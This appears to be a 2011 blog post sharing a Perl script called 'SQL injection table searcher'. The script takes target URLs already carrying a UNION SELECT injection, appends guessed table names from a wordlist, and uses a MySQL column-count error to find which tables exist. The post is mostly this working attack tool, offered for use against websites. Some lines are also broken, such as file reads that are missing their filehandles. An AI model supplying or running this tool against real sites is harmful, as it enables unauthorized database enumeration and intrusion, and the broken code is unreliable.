Thursday, 28 April 2011

SQL injection table searcher (perl)


#!/usr/bin/perl
#coded by skillfak3r


#NOTE: U must have the 2 txt files present, urls.txt and wordlist.txt
#its self-explanatory ;)


#input the url in urls.txt like this:
# http://www.somesite.com/galerie3/gal...age.php?pid=-1 union all select 1 from


use LWP::UserAgent;
$xsc = "urls.txt\n";
$source = "wordlist.txt\n";
my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)' );
open(FILE, $source) or die("wtf??Can't open it!\n");
my @tables = ;
close(FILE);

open(FILEZ, $xsc) or die("wtf??Can't open it!\n");
my @urls = ;
close(FILEZ);

foreach $url (@urls) {
$url =~ s/^\s+//;
$url =~ s/\s+$//;

print "TARGET - $url\n\n\n";
foreach $table (@tables) {
$table =~ s/^\s+//;
$table =~ s/\s+$//;
print "TRYING $table - ";
my $response = $ua->get($url . ' ' . $table .'--');
if ($response->is_success) {
if ($response->content =~ m/The used SELECT statements have a different number of columns/gi) {
print "\tOK\n\n";
last;
} else {
print "\tFAILED\n";
next;
}

}
else {
print "FAIL - $response->status_line\n\n";
}
}
}
print "\n\n\n[[DONE]]\n";
$x = <>;

No comments:

Post a Comment